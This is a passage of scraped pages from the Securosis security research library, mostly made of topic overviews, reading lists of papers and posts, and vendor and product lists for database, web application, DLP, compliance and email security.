DRM/ERM 2. Data Labels Suck. 3. Security Requirements for Electronic Medical Records. 4. The Data Breach Triangle. 5. Data Harvesting and Privacy. Presentations --------- These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section). * This is the Business Justification for Data Security Presentation that Rich and Adrian provided in February 2009. * This presentation is on Mobile Data Security for the Enterprise. * Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle. * Here’s the current version of Pragmatic Data Security which provides a good, practical process overview with specific implementation details. * Presentation on Data Protection in the Enterprise. Kind of a corporate overview. * Presentation on XML Security. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools. If much of this material seems somewhat generic, that’s because data /information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu.

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper: * Understanding and Selecting a Web Application Firewall * SIEM 2.0: Replacing Your SIEM Solution * Securing Applications at Scale * Masking for Compliance * Code Security: Security for Developers * Pragmatic Data Security * Network Security Fundamentals * Endpoint Security Fundamentals * Database Security 2.0: Database Security for Relational and Non-relational Systems * Understanding and Implementing Network Segregation * Data Security for the Cloud Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library.

==> All Research Papers

http://securosis.com/feeds/research Application Security Securing Big Data: Recommendations for Securing Hadoop and NoSQL Pragmatic WAF Management: Giving Web Apps a Fighting Chance Building a Web Application Security Program Cloud and Virtualization Compliance Tokenization Guidance Tokenization vs. Encryption: Options for Compliance Data Encryption 101: A Pragmatic Approach to PCI Data Security Understanding and Selecting Data Masking Solutions Implementing and Managing a Data Loss Prevention Solution Defending Data on iOS Understanding and Selecting a Database Security Platform Understanding and Selecting a File Activity Monitoring Solution Database Activity Monitoring: Software vs. Appliance The Securosis 2010 Data Security Survey Understanding and Selecting a Tokenization Solution Understanding and Selecting a DLP Solution Understanding and Selecting a Database Encryption or Tokenization Solution Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0) Database Assessment Content Discovery Whitepaper Selecting a Database Activity Monitoring Solution Endpoint Security The Endpoint Security Management Buyer’s Guide Endpoint Security Fundamentals Best Practices for Endpoint DLP Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks Network Security Defending Against Denial of Service (DoS) Attacks Network-based Malware Detection: Filling the Gaps of AV Applied Network Security Analysis: Moving from Data to Information Fact-Based Network Security: Metrics and the Pursuit of Prioritization Network Security in the Age of Any Computing Understanding and Selecting an Enterprise Firewall Project Quant Malware Analysis Quant Measuring and Optimizing Database Security Operations (DBQuant) Network Security Ops Quant Metrics Model Network Security Operations Quant Report Project Quant Survey Results and Analysis Project Quant Metrics Model Report Security Management Implementing and Managing Patch and Configuration Management Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management) Security Management 2.0: Time to Replace Your SIEM? Security Benchmarking: Going Beyond Metrics React Faster and Better: New Approaches for Advanced Incident Response Monitoring up the Stack: Adding Value to SIEM Understanding and Selecting SIEM/Log Management The Business Justification for Data Security

==> Vendor List

http://securosis.com/feeds/research Company Name Exhibitor Type Booth Number Sub-category Category Website 3M Mobile Interactive Solutions Division Exhibitor 2740 Mobile Security Endpoint Security http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ ActivIdentity Exhibitor 1128 Authentication Identity and Access Management http://www.actividentity.com/ Advanced Product Design Exhibitor 340 Advantech Exhibitor 217 AFC Industries Exhibitor 235 Furniture Other http://www.afcindustries.com/ Agiliance Exhibitor 2351 Compliance Security Management and Compliance http://www.agiliance.com/ Akamai Technologies Silver Sponsor 2017 Content Delivery http://www.akamai.com Alert Enterprise Exhibitor 351 Compliance Security Management and Compliance http://www.alertenterprise.com/ Alert Logic Exhibitor 2529 IDS/IPS Network Security http://www.alertlogic.com/ AlgoSec Exhibitor 856 Firewalls Network Security http://www.algosec.com/en/index.php AlienVault Exhibitor 652 SIEM/Log Management Security Management and Compliance http://www.alienvault.com/ Alta Associates Inc. Exhibitor 850 Compliance Security Management and Compliance http://www.altaassociates.com/ AMAX Information Technologies Exhibitor 346 http://www.amaxit.com/ American Portwell Technology, Inc. Exhibitor 628 http://www.portwell.com/ Anakam, an Equifax Company Exhibitor 226 Authentication Identity and Access Management http://www.anakam.com/ Anne Arundel Community College Exhibitor 2728 Education Other http://www.aacc.edu/ Anonymizer, Inc. Exhibitor 2722 Content Security Network Security http://www.anonymizer.com/ Antiy Labs Partner Pavilion 1541 Endpoint Security http://www.antiy.net/ Anue Systems Inc. Exhibitor 2445 Application Testing Application Security http://www.anuesystems.com/ APCON Exhibitor 832 http://www.apcon.com/ Application Security, Inc. Exhibitor 639 Database Security, Vulnerability Assessment Data Security, Security Management and Compliance http://www.appsecinc.com/ AppRiver Exhibitor 1059 Managed Services Email/Web Security http://www.appriver.com/ Approva Exhibitor 428 Compliance Security Management and Compliance http://www.approva.net/ Araknos SRL Unipersonale Exhibitor 347 SIEM/Log Management Security Management and Compliance http://www.araknos.it/en/azienda/azienda.html ArcSight Exhibitor 931 SIEM/Log Management Security Management and Compliance http://www.arcsight.com/ Armorize Technologies Inc. Exhibitor 329 Web Application Assessment Application Security http://www.armorize.com/ Art of Defence GmbH Partner Pavilion 1350 http://www.artofdefence.com/ Art of Defence GmbH Exhibitor 342 Web App Firewalls Application Security http://www.artofdefence.com/ Arxan Technologies Exhibitor 328 Secure Development Application Security http://www.arxan.com/ Astaro Exhibitor 2251 Firewalls, Email Security Gateway, Web Security Gateway Network Security, Email/Web Security http://www.astaro.com/ AT&T Exhibitor 831 http://www.att.com/ atsec information security Partner Pavilion 1350 Compliance Security Management and Compliance http://www.atsec.com/ Authentify, Inc. Exhibitor 1029 Authentication Identity and Access Management http://www.authentify.com/ Authernative, Inc. Exhibitor 550 Authentication Identity and Access Management http://www.authernative.com/ Avenda Systems Exhibitor 318 NAC Network Security http://www.avendasys.com/ Axway Silver Sponsor 2225 http://www.axway.com/ BeCrypt Inc. Exhibitor 2129 Disk Encryption Endpoint Security http://www.becrypt.com/ Beijing LinkTrust Technologies Development Co.,Ltd. Partner Pavilion 1541 Perimeter Defense Network Security http://www.linktrust.com.cn/ Beijing Topsec Science and Technology Co.,Ltd Partner Pavilion 1541 Beijing Venustech Inc. Partner Pavilion 1541 Perimeter Defense Network Security http://english.venustech.com.cn/ Beijing Zhongguancun Overseas Science Park Exhibitor 1541 http://www.zgc.gov.cn/english/ BeyondTrust Corp. Exhibitor 945 Anti-Malware Endpoint Security http://www.beyondtrust.com/ Bit9, Inc. Exhibitor 2621 Anti-Malware Endpoint Security http://www.bit9.com/ Bivio Networks Exhibitor 2133 Content Security Network Security http://www.bivio.net/ Black Box Network Services Exhibitor 2550 http://www.blackbox.com/ BlockMaster AB Exhibitor 2425 Mobile Security Endpoint Security http://www.blockmastersecurity.com/ Blue Coat Systems, Inc. Gold Sponsor 1139 Threat Mgmt, Anti-Malware, Web Security Gateway Network Security, Email/Web Security http://www.bluecoat.com/ BluePoint Security Exhibitor 2559 Cloud Security Virtualization and Cloud http://www.bluepointsecurity.com/ Brainloop Inc. Partner Pavilion 1350 Access Management Data Security http://www.brainloop.com/ BreakingPoint Systems, Inc. Exhibitor 951 Monitoring Network Security http://www.breakingpointsystems.com/ BroadWeb Corporation Partner Pavilion 1541 Perimeter Defense Network Security http://www.broadweb.com/ Bsafe Information Systems Inc. Exhibitor 855 Compliance Security Management and Compliance http://www.bsafesolutions.com/ BSI Partner Pavilion 1344 http://www.bsigroup.com/ C4ISR Journal Exhibitor 2650 Publication Other http://www.c4isrjournal.com CA Technologies Platinum Sponsor 1533 DLP, SIEM/Log Management, Compliance Data Security, Security Management and Compliance http://ca.com/ Capella University Exhibitor 251 Education Other http://www.capella.edu/ Cavium Networks Exhibitor 528 http://www.caviumnetworks.com/ Hardware CCSO.com Exhibitor 2619 http://www.ccso.com/ Disassembler Celestix Networks Exhibitor 852 Perimeter Defense Network Security http://www.celestix.com/ Cenzic, Inc. Exhibitor 332 Application Testing, Application Assessment Application Security http://www.cenzic.com/ Check Point Software Technologies Exhibitor 2317 Firewalls, IDS/IPS, Remote Access, Disk Encryption Network Security, Endpoint Security http://www.checkpoint.com/ Cherry Exhibitor 755 http://www.cherrycorp.com/ Hardware China quality certification certificate authority Partner Pavilion 1541 Compliance Security Management and Compliance http://www.cqc.com.cn/english/ CipherOptics Exhibitor 1923 Encryption Data Security http://www.cipheroptics.com/ Cisco Global Platinum Sponsor 1717 Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services Network Security, Email/Web Security http://www.cisco.com/ Cloud Security Alliance Exhibitor 2718 http://www.cloudsecurityalliance.org/ Comodo Group, Inc. Exhibitor 2439 Endpoint Defense Endpoint Security http://www.comodo.com/ CoreTrace Corporation Exhibitor 1963 Anti-Malware Endpoint Security http://www.coretrace.com/ CORISECIO GmbH Partner Pavilion 1350 http://www.corisecio.com/ Coverity Exhibitor 333 Secure Development Application Security http://www.coverity.com/ Critical Watch Exhibitor 950 Compliance Security Management and Compliance http://www.criticalwatch.com/ Cryptography Research, Inc. Exhibitor 2233 http://www.cryptography.com/ Secure dev hardware cv cryptovision GmbH Partner Pavilion 1350 Encryption Data Security http://www.cryptovision.com/ Cyber-Ark Software, Inc. Exhibitor 2045 Authentication Identity and Access Management http://www.cyber-ark.com/ Cybera Exhibitor 752 Compliance Security Management and Compliance http://www.cybera.com/ Cyberoam Exhibitor 723 Perimeter Defense Network Security http://www.cyberoam.com/ Damballa Exhibitor 433 Endpoint Defense Endpoint Security http://www.damballa.com/ Dasient, Inc. Exhibitor 554 Endpoint Defense Endpoint Security http://www.dasient.com/ Dataguise Inc. Exhibitor 645 Database Security Data Security http://www.dataguise.com/ Department of Homeland Security/ US-CERT Exhibitor 457 http://www.us-cert.gov/ DeviceLock Exhibitor 2228 Mobile Security

==> Welcome to Securosis Research

http://securosis.com/feeds/research Download the Coverage Map (PDF) * About Our Research * About the Research Library About Our Research -------------- * Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works. In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis. Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes: * Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating. * Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important. * Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to. * Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first). In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.
For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice: * Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution. * Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy, but the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research. * Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library. The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like. Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products. We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions.

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page.

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page.

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page.

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related.

==> Compliance

http://securosis.com/feeds/research Papers and Posts ------------ This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks. General Coverage ------------ 1. It Isn’t Risk Management If You Can’t Lose 2. Visa’s Data Field Encryption 3. Tokenization Will Become the Dominant Payment Transaction Architecture 4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council 5. We Know How Breaches Happen 6. New Details, and Lessons, on Heartland Breach 7. Heartland Hackers Caught; Answers and Questions 8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems Presentations --------- * Presentation on Tokenization Guidance for PCI. * Presentation on Data Breaches and Encryption. * Presentation on Data Protection in the Enterprise. This is a corporate overview. * Presentation on Encrypting Mobile Data for the Enterprise. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections.

==> Database Security

http://securosis.com/feeds/research Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands. To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the later category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and comments). 1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper. 2. Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper. 3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors their product teams learned some tips from this paper, and we think you will too. 4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available. 5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques. 6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases,and threat vectors to consider when encrypting data. 7. The 5 laws of Data Masking. Database Security Patch Coverage
1. Oracle Critical Patch Update, July 2009. General Coverage ------------ 1. SQL Injection Prevention 2. Database Audit Performance in this Friday Summary introduction 3. Database Encryption Benchmarking 4. Three Database Roles: Programmer, DBA, Architect 5. Database Security: The Other First Steps 6. Sentrigo and MS SQL Server Vulnerability. 7. Amazon’s SimpleDB. 8. Information on Weak Database Password Checkers. 9. Database Connections and Trust, and databases are not typically set up to validate incoming connections against SQL injection and misused credentials, and this post on recommending Stored Procedures to address SQL Injection attacks 10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database. 11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks. 12. Your Top 5 Database Security Resolutions. 13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security. 14. A look at general threats around using External Database Procedures and variants in relational databases. 15. Database Audit Events. 16. Database Security Mass-Market Update and Friday Summary - May 29, 2009 17. Database Patches, Ad Nauseum 18. Acquisitions and Strategy 19. Comments on Oracle’s Acquisition of Sun 20. Oracle CPU for April 2009 21. Netezza buys Tizor 22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements. 23. Policies and Security Products applies to database security as well as other product lines. 24. Oracle Security Update for January 2009. 25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds. 26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment. 27. Behavioral Monitoring for database security. 28. NitroSecurity acquired RippleTech. 29. Database Monitoring is as big or bigger than DLP. Presentations --------- * Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF) * Oracle database Security in a Down Economy. (PDF) Podcasts, Webcasts and Multimedia
None at this time Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Database Security Platforms * Application Security Inc. (DBProtect) * Fortinet. * GreenSQL. * IBM (Guardium). * Imperva (SecureSphere) * McAfee (Sentrigo) (Nitro). * Oracle (Secerno). Database Vulnerability Assessment * Application Security Inc.. (AppDetective, DBProtect) * Fortinet. (IPLocks). * IBM (Guardium). * Imperva. (DAS, Scuba) * McAfee. (Sentrigo) * Oracle. (mValent, Config. Packs) * Qualys. * Tenable Network Security. (Nessus) * Next Generation Security Software NGS. (Squirrel) Database Encryption * NetLib. * Oracle. (TDE, API) * Protegrity. * Prime Factors. * Relational Wizards. * RSA. (Valyd) * SafeNet. (Ingrian) * Sybase. * Thales. (aka nCipher) * Trustwave. (Vericept) * Voltage. Note that some of the vendors listed provide transparent disk encryption or application layer encryption that can be applied to database files or content. Database Auditing * GreenSQL * Oracle (Audit Vault). * SoftTree Technologies. (DB Audit Expert) * Quest. (InTrust for DB) Note that all DAM vendors provide auditing to one degree or another. This section is to designate specific products that provide database auditing, are not part of a DAM solution, and are not built into a database platform as a standard component. Database Masking * Axis Technology. * Camouflage. * dataguise. * Embarcadero. * Grid-Tools. * GreenSQL. * Hexaware/Akiva. * IBM. (Optim/Princeton Softech) * Informatica. (ETL + Applimation) * MENTiS Software. * Voltage. (ETL + Dynamic) Note that there are several vendors who offer format preserving encryption and tokenization, such as NuBridges, Prime Factors, Protegrity and Voltage, which also provides some masking capabilities. Database Vendors * IBM. * Oracle. (Oracle, MySQL) * Sybase. * Teradata. * Apache. (Derby) * PostgreSQL. (Postgres) * Ingres. (Open Ingres) There are dozens of vendors, both big and small, who offer databases – many with specific competitive advantages. We aren’t even attempting to comprehensive, and specifically ignored any without widespread mainstream adoption. There are also dozens more open source databases with small numbers of deployments, perhaps primarily embedded in applications or backending non-commercial web applications.

==> Web Application Security

http://securosis.com/feeds/research Here we focus on security specifically for web applications, as opposed to traditional corporate or enterprise applications. Our research pages on general application security should be used in tandem with this one, but this section focuses on the unique issues of web application security. By our definition, Web Application Security is a super-set of traditional application security. Why? Because more often than not, web applications are backed by enterprise applications. They have all of the same problems, along with a handful of new security issues that are specific to offering distributed programs and functions across the Internet. For example web applications offer features and functions to users outside the corporate network, so they cannot make any assumptions about the security of the network transmission nor the intentions of the user. They run on top of a complex conglomeration of services, consist primarily of custom code, produce dynamic content, and provide their UI entirely through a browser. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. The most important piece of work we’ve published on Web Application Security is Building a Web Application Security Program. For those of you who followed along with the blog series, this is a compilation of that content, but it’s been updated to reflect all the comments we received, with additional research, and the entire report was professionally edited. The original blog series can be found here (Part 1, Part 2, Part 3, Part 4, Part 5, Part 6, Part 7, and Part 8. As well as a couple points we forgot to mention. 2. Rich’s post on How the Cloud Destroys Everything that I Love (About Web App Security). 3. The Risks of Trusting Content. 4. Web Application Security: We Need Web Application Firewalls to Work. Better. General Coverage ------------ 1. XML Security Overview 2. It’s Thursday the 13th—Update Adobe Flash Day 3. Heartland Hackers Caught; Answers and Questions 4. Using a Mac? Turn Off Java in Your BrowserWere All Gonna Get Hacked is about the browser, not the app, but we’ll cross reference here. 5. There Are No Trusted Sites: Security Edition 6. Click-jacking Details, Analysis, and Advice. 7. Comments on “Containing Conficker”, a brief analysis of the Honeynet Project’s Know Your Enemy paper, an examination of how the Conficker worm attacks and behaves in general. 8. WAF vs. Secure Code vs. Dead Fish. 9. Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. Presentations --------- * Our presentation on Building A Web Application Security Program. This was presented as supplementary material to the white paper of the same name. * Presentation on Integrating Penetration Testing Into a Web Application Vulnerability Assessment Program. (PDF) Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Remember that web application security is over and above the standard application security practices and technology, and these should be considered alongside other tools. We strongly encourage you to learn about the specifics of subcategories in the navigation menu. Web Application Assessment * Cenzic * HP * Secure Works * WhiteHat Security Penetration Testing * AppLabs * Bonsai * CGISecurity * Core Security Technologies * McAfee (Foundstone) * Plynt * Rvasi * WindowSecurity.com Static Source Code Review * Aspect Security * Cigital * Fortify * IBM * Ounce * Veracode Dynamic Source Code Review * Coverity * Ounce * Veracode Web Application Firewalls * armorlogic. * ArtofDefense Hyperguard * Barracuda Networks. * Breach. * Cisco. * F5. * Fortify. * Fortinet * Imperva. * Protegrity. Monitoring (All WAF vendors can monitor as well.) Education & Training * SANS Institute * SAIC Most regional ISSA and ISACA chapters can provide assistance as well.

==> Web, Email, and Data Portal Security

http://securosis.com/feeds/research This research page covers web filtering as well as email security and anti-spam options. The email security market, like the web gateway market, is one of the most saturated and commoditized in the security industry. As with firewalls and anti-virus (on Windows), it is essentially impossible to do business without these tools. And to no one’s surprise we see continued convergence of these threat protection products; in some cases, it’s merely mergers and acquisitions to provide two separate products from the same vendor, but in other cases we see combined solutions – often in an attempt to displace point products. As many of the site-managed solutions also offer gateway and secure data exchange services, we will cover that here as well. The intended audience for this page is those interested in security products for their business, to keep their users’ inboxes free of spam, and ensure Internet browsing stays within company policy. In the past we would just have said ‘bleep’, as that is why many of these platforms are purchased. In reality there are many other security and compliance uses for these technologies, which are as least as important. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments). 1. Barracuda Networks Acquires Purewire 2. McAfee Acquires MX Logic 3. The Symantec acquisition of MessageLabs demonstrates that the battle for this fully commoditized market is not over. 4. Marshal8e6 Buys Avinti, and how the smaller vendors need to innovate and re-position their technologies to compete. General Coverage ------------ 1. The First Phishing Email I Almost Fell For 2. I Heart Creative Spam 3. Spam Levels and Anti-Spam SaaS. 4. Hackers 1, Marketing 0. Presentations --------- PDF versions of presentations (when available) may also be useful, although they don’t include any audio (for any audio/video, please see the next section). Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email if you have any additions or corrections. Vendors * Aladdin * Astaro * Axway (Tumbleweed) * Barracuda Networks * Cisco (Ironport) * Clearswift (MIMESweeper) * Cloudmark * CommTouch * Google (Postini) * Marshal8e6 (Mail Marshal + 8e6 Technologies) * McAfee (IronMail, WebWasher, Secure Computing, CipherTrust) * Proofpoint * SonicWall (MailFrontier) * Symantec (BrightMail and MessageLabs) * WebSense

==> Research: Data Loss Prevention

http://securosis.com/feeds/research We’ve probably written more about Data Loss Prevention than any other single technology. Actually, we prefer to call it Content Monitoring and Protection (CMP), but when we use that only about 3 people know what we’re talking about. We define CMP/DLP as: Products that, based on central policies, identify, monitor, and protect data at rest, in motion, and in use through deep content analysis. We use a pretty narrow definition to keep things clear – CMP/DLP is a defined product category, not some general definition for anything that protects data. Encryption, DRM, portable device control, and all the other things that call themselves DLP can help with data loss, but aren’t DLP. We think using a big bucket like that only confuses people. The best way to tell if something is DLP is to focus on the content awareness/analysis. If it only uses keywords or basic regular expressions, it isn’t really DLP. Now why should you care about DLP? Is it just another over-hyped technology? Nope – we consider it to be one of the most significant security technologies to emerge over the past few years. By adding content and context awareness, we can now protect information based on what it is, as opposed to where it’s stored or some silly label someone slapped on it as metadata. CMP tools are also expanding their understanding of business context, not just the data itself, so we can apply intelligent policies that reflect business processes, while only interfering with said processes when there is a policy violation. CMP helps us find our sensitive information, watch how it’s being used, and then protect it. It’s far from perfect, but it’s still good enough that we recommend it, and we’d use it ourselves if we didn’t just give away all of our stuff for free. We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it was added to help you find changes more easily. Papers and Posts ------------ If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all of the public comments as well). 1. The most important piece of work we’ve published on CMP/DLP is our white paper, [Understanding and Selecting a Data Loss Prevention Solution(/research/publication/report-data-loss-prevention-whitepaper/). This report covers all the basics- features, architectures, use cases, and a recommended selection process with testing criteria. It was originally released as a series of blog posts: part 1 (introduction), part 2 (content awareness), part 3 (data-in-motion), part 4 (data-at-rest), part 5 (data-in-use/endpoint), part 6 (central administration), and part 7 (selection process). This is really the place to start if you need to learn about DLP. 2. I also wrote a feature for Information Security Magazine that covers similar material, but is much more condensed. 3. We also released a paper on Best Practices for DLP Content Discovery. This covers all the important issues when using DLP for data at rest. It was also a 6 part series: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 4. The third paper in our CMP/DLP series is dedicated to Best Practices for Endpoint DLP. As always, available in a series of blog posts: part 1, part 2, part 3, part 4, part 5, part 6 (use cases). 5. An early article on DLP as a feature vs. a full solution: DLP Is A Feature, CMF (Or Whatever We’ll Call It) Is A Solution. 6. A discussion on the evolution of CMP: DLP/ILP/Extrusion Prevention < CMF < CMP < SILM: A Short Evolution of Data Loss Prevention. 7. A short piece I did for Network World on DLP, and why it’s worth looking at now. 8. I’m a big proponent of full DLP solutions- this explains why: Data Protection Isn’t A Network Security Or Endpoint Problem. 9. The dirty little secret of DLP. 10. Data protection developments are running along parallel paths – one for productivity applications and communications (CMP/DLP), and the other in the data center (ADMP). Our definitions of DLP and ADMP. 11. Then a post on how those two worlds will connect. 12. A Network World article I wrote on pitfalls of DLP. 13. A look at the differences between DLP, content classification, and e-discovery. 14. You can also use DLP to help prevent malicious outbound connections from sophisticated attackers. 15. In Quick Wins with Data Loss Prevention we cut through the complexity and provide a process for getting immediate value out of your DLP investment, while still setting yourself up for the long term. Presentations --------- Presentation on Understanding and Selecting a Data Loss Prevention System. This is a companion to the DLP White Paper. Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic. Vendors/Tools --------- The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Note that many other products include “DLP light” features, such as basic keyword or regex matching. We are only including dedicated DLP solutions here. Full Suite DLP * CA (Orchestria) * Code Green Networks * EMC/RSA (Tablus) * GTB Technologies * McAfee (Reconnex) * Symantec (Vontu) * Vericept * Websense (PortAuthority) * Workshare Network-only tools * Clearswift * Fidelis Security Systems * Palisade Systems * Proofpoint Endpoint-only tools * NextSentry * Trend Micro (Provilla) * Verdasys

==> Application Security

http://securosis.com/feeds/research This section of the research library is dedicated to application security in its many forms. On this page we cover the basic topics; such as Access Control, Monitoring & IDS, SIM, SEM, and Log Management. For other specialized fields within application security, such as web application security and secure software development practices, we provide dedicated subsections. On the navigation bar you will see that we already have a few pages for specific coverage areas. We will continue to fill out our application security offerings, and provide additional specific coverage areas over time. Feel free to make a request if you have something in this area you are interested in seeing. Papers and Posts ------------ * Adrian’s comments on structured software development security programs and the problems moving from Waterfall to Agile Software Development. * How Common Applications Are (Now) the Weakest Link. * Comments on “Containing Conficker” considers some of the challenges most application developers are up against. * Immutable Log technologies help with auditing and event trail verification. * For application security, the implementation and management of a policy set is a key factor in the cost and effectiveness of just about any security product (and, frankly, your happiness as well). * Separation of Duties, Concept of Least Privilege, and other role-based user security measures. * The Perils of the Insider Threat. * PDF Security Pain, and stuff to think about on all script-enabled applications. * A very cool way of 